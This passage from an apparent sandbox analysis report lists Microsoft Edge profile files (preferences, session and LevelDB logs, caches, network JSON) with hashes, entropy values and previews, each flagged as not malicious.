                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:192:stwSjskCUaFvrEmk3V3z88bV+FiAuCU6P/hYJ:stwYskXCDIbGiXp1
                                                                                                                                                                                                                                                                                                                        MD5:BE6FF18F2725E884CE8450DC8EA28035
                                                                                                                                                                                                                                                                                                                        SHA1:D5F01124EB2225AC68DFBF6E7A08593EB9B536CE
                                                                                                                                                                                                                                                                                                                        SHA-256:D6A7E9821195DEC9F115B89E12D8D12932F4C67FF579C9C496C40EF90B0785D5
                                                                                                                                                                                                                                                                                                                        SHA-512:26A6E03BA15B9AF9E76AB09CF6DE946BB30E56CC7F85C10367F751522912AFF18CE360773DB7EF6BC89F35B757BA38CE39FD4BA2A75D092C5C2615A3C8BD5DA1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326024597217","domain_dive

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):25012
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5672836502774095
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:DPNR7GWQ0W5wRhf4vG8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPQ4Irgi6rwX7FpVtE:DFlGJ0WaRhfqGu1jaRVD/rJtE
                                                                                                                                                                                                                                                                                                                        MD5:D46F53C67C20F6E69D2A21CB58BFAA05
                                                                                                                                                                                                                                                                                                                        SHA1:C495574EF0FCA3EA4569857FC6287E254FBB0B17
                                                                                                                                                                                                                                                                                                                        SHA-256:482FBD85CD5FDA4B54A731B348637120D08A0D453312C440534C67E3A38B7827
                                                                                                                                                                                                                                                                                                                        SHA-512:FABAA7EBAD54035B0CD103685CC2D67C47D550993D0D0D264DA17200D18B11C2DC0D8202D901E3FBBBB08B802C29BFC8B3717074816D9EC79CF986233CF87CCC
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326023865607","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326023865607","location":5,"ma

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3df84.TMP (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):25012
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5672836502774095
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:768:DPNR7GWQ0W5wRhf4vG8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPQ4Irgi6rwX7FpVtE:DFlGJ0WaRhfqGu1jaRVD/rJtE
                                                                                                                                                                                                                                                                                                                        MD5:D46F53C67C20F6E69D2A21CB58BFAA05
                                                                                                                                                                                                                                                                                                                        SHA1:C495574EF0FCA3EA4569857FC6287E254FBB0B17
                                                                                                                                                                                                                                                                                                                        SHA-256:482FBD85CD5FDA4B54A731B348637120D08A0D453312C440534C67E3A38B7827
                                                                                                                                                                                                                                                                                                                        SHA-512:FABAA7EBAD54035B0CD103685CC2D67C47D550993D0D0D264DA17200D18B11C2DC0D8202D901E3FBBBB08B802C29BFC8B3717074816D9EC79CF986233CF87CCC
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326023865607","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326023865607","location":5,"ma

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):213
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.7541301583060975
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
                                                                                                                                                                                                                                                                                                                        MD5:046CC08D163FC4578CD1B77A5D0965AC
                                                                                                                                                                                                                                                                                                                        SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
                                                                                                                                                                                                                                                                                                                        SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
                                                                                                                                                                                                                                                                                                                        SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.096694970128441
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LYLp3+q2PN723oH+TcwtrQMxIFUt8OLYLD4Zmw+OLYL9Uzd3VkwON723oH+TcwJ:7KEvVaYebCFUt8OK0/+OK2xF5OaYebtJ
                                                                                                                                                                                                                                                                                                                        MD5:E265E1042B48516C1EE702330A62FDD0
                                                                                                                                                                                                                                                                                                                        SHA1:358A6ACDB0FEB3A678B5489BC0FD13ABB8A8BFF4
                                                                                                                                                                                                                                                                                                                        SHA-256:7A7A04CC89015E4C8F23E100F815496B796F02F79B73BB3D9ABDBDFA3A521679
                                                                                                                                                                                                                                                                                                                        SHA-512:E3D1B166D56DF0DC0B3F7210B3A4DF6FD6569BF68F6AA5BBA437B18E2DBF719FB685D1DE22C445FD0B7FF9221FE8353FD9F4CDB705C2FF8B1762D9D2D25BABF7
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:25.015 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:40:25.016 1d98 Recovering log #3.2024/12/10-12:40:25.021 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.096694970128441
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LYLp3+q2PN723oH+TcwtrQMxIFUt8OLYLD4Zmw+OLYL9Uzd3VkwON723oH+TcwJ:7KEvVaYebCFUt8OK0/+OK2xF5OaYebtJ
                                                                                                                                                                                                                                                                                                                        MD5:E265E1042B48516C1EE702330A62FDD0
                                                                                                                                                                                                                                                                                                                        SHA1:358A6ACDB0FEB3A678B5489BC0FD13ABB8A8BFF4
                                                                                                                                                                                                                                                                                                                        SHA-256:7A7A04CC89015E4C8F23E100F815496B796F02F79B73BB3D9ABDBDFA3A521679
                                                                                                                                                                                                                                                                                                                        SHA-512:E3D1B166D56DF0DC0B3F7210B3A4DF6FD6569BF68F6AA5BBA437B18E2DBF719FB685D1DE22C445FD0B7FF9221FE8353FD9F4CDB705C2FF8B1762D9D2D25BABF7
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:25.015 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/10-12:40:25.016 1d98 Recovering log #3.2024/12/10-12:40:25.021 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13378326026365838

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2222
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.450151600871609
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:3lyzKBltI1HgqPpaMkUt1qu5DF+k++4Ugv+k+G8Askob2pEHSJHUt1qul:3lyzKTO1HgqPbAc4k+Ik+G8As81Za
                                                                                                                                                                                                                                                                                                                        MD5:9ACAE64B5CAE62F9BE379F4913757136
                                                                                                                                                                                                                                                                                                                        SHA1:73711555F54D2EAC6BC1C9BBB0DF6C4E07902189
                                                                                                                                                                                                                                                                                                                        SHA-256:38F530A4DE8406E1119429C450E87E95DE021E1C81CF9154D8D0BD9DD677EB65
                                                                                                                                                                                                                                                                                                                        SHA-512:9C67193F9C551D9D6A99B46C3B504DD3D546243BC1D50918D9AF7797741BF8D46C29E4A643665F390EDCC8BB7ED30A5D118127DA56FFC502B963BC4511146D82
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SNSS..........V..............V......"...V..............V..........V..........V..........V....!.....V..................................V...V1..,......V$...7f6d5d67_64ad_428a_853f_82e1139c9d38......V..........V.....A............V......V....................5..0......V&...{46F3A197-DB49-410A-81B3-94975C835573}........V.............V..........V....!.....V..................................V...V1..,......V$...922254ed_5998_4a0a_9030_6c3407027626......V..........V................V..............V....;...file:///C:/Users/user/AppData/Local/Temp/1225428425.pdf.............!............................................................................................................(.......(..H.......`.......................................................................~...;...f.i.l.e.:./././.C.:./.U.s.e.r.s./.e.n.g.i.n.e.e.r./.A.p.p.D.a.t.a./.L.o.c.a.l./.T.e.m.p./.1.2.2.5.4.2.8.4.2.5...p.d.f...................................8.......0.......8.................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                        MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                        SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                        SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                        SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):356
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.077470578074261
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LeLNjq2PN723oH+Tcwt7Uh2ghZIFUt8OLeLNWZmw+OLeLNqkwON723oH+Tcwt7w:7KpjvVaYebIhHh2FUt8OKpW/+OKpq5On
                                                                                                                                                                                                                                                                                                                        MD5:E996A0A7F9CBA82288A2F72AF97D8330
                                                                                                                                                                                                                                                                                                                        SHA1:E671C75E2BB82402431C59732586786FBE2E3B8D
                                                                                                                                                                                                                                                                                                                        SHA-256:40B66BECDF2A0E7B360247E1964D31C0458AA0A1BAAFA112CCEA4D88C397B7BA
                                                                                                                                                                                                                                                                                                                        SHA-512:E59632DBA309C08769BA06632757C88C9000DF99CADE08C712E6D5ACC912B6623FE7F823C7A5EB1327329A11F12DDCFF41BE3F83A539D212AF67AC7D4D9F0F04
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.881 1cd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:40:23.881 1cd4 Recovering log #3.2024/12/10-12:40:23.881 1cd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):356
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.077470578074261
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LeLNjq2PN723oH+Tcwt7Uh2ghZIFUt8OLeLNWZmw+OLeLNqkwON723oH+Tcwt7w:7KpjvVaYebIhHh2FUt8OKpW/+OKpq5On
                                                                                                                                                                                                                                                                                                                        MD5:E996A0A7F9CBA82288A2F72AF97D8330
                                                                                                                                                                                                                                                                                                                        SHA1:E671C75E2BB82402431C59732586786FBE2E3B8D
                                                                                                                                                                                                                                                                                                                        SHA-256:40B66BECDF2A0E7B360247E1964D31C0458AA0A1BAAFA112CCEA4D88C397B7BA
                                                                                                                                                                                                                                                                                                                        SHA-512:E59632DBA309C08769BA06632757C88C9000DF99CADE08C712E6D5ACC912B6623FE7F823C7A5EB1327329A11F12DDCFF41BE3F83A539D212AF67AC7D4D9F0F04
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.881 1cd4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/10-12:40:23.881 1cd4 Recovering log #3.2024/12/10-12:40:23.881 1cd4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                        MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                        SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                        SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                        SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):438
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.217180376957098
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7pvVaYebvqBQFUt8Oj/+OSv5OaYebvqBvJ:7VVaYebvZg8OHShOaYebvk
                                                                                                                                                                                                                                                                                                                        MD5:247C60AFC978B286CE2A8A0E9A97CDD3
                                                                                                                                                                                                                                                                                                                        SHA1:4613BCCC287440F7FDCE3B4FA8EB4CF93A705DB4
                                                                                                                                                                                                                                                                                                                        SHA-256:04D87476FF88B561F82AD0AE8FED8D6DD31C31C4128509486B6D44E26A1955BE
                                                                                                                                                                                                                                                                                                                        SHA-512:D520F2E3652552276C455ACF79B37BA90249B4A6251FB36CB7C9CBC5D54E480768C333B6619A722C35167AAD97012919FEA4F62CC9AA31E73FB89E6F9E8CFA9C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:26.041 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:26.071 1d98 Recovering log #3.2024/12/10-12:40:26.076 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):438
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.217180376957098
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7pvVaYebvqBQFUt8Oj/+OSv5OaYebvqBvJ:7VVaYebvZg8OHShOaYebvk
                                                                                                                                                                                                                                                                                                                        MD5:247C60AFC978B286CE2A8A0E9A97CDD3
                                                                                                                                                                                                                                                                                                                        SHA1:4613BCCC287440F7FDCE3B4FA8EB4CF93A705DB4
                                                                                                                                                                                                                                                                                                                        SHA-256:04D87476FF88B561F82AD0AE8FED8D6DD31C31C4128509486B6D44E26A1955BE
                                                                                                                                                                                                                                                                                                                        SHA-512:D520F2E3652552276C455ACF79B37BA90249B4A6251FB36CB7C9CBC5D54E480768C333B6619A722C35167AAD97012919FEA4F62CC9AA31E73FB89E6F9E8CFA9C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:26.041 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:26.071 1d98 Recovering log #3.2024/12/10-12:40:26.076 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\330b6b52-7e94-4de4-a7a2-b98242182a65.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\4715acbf-0566-4d1d-a76a-c4ce2662a1f9.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\55bbe107-c711-475c-b163-b126d2dd8ab0.tmp

                                                                                                                                                                                                                                                                                                                        Download File
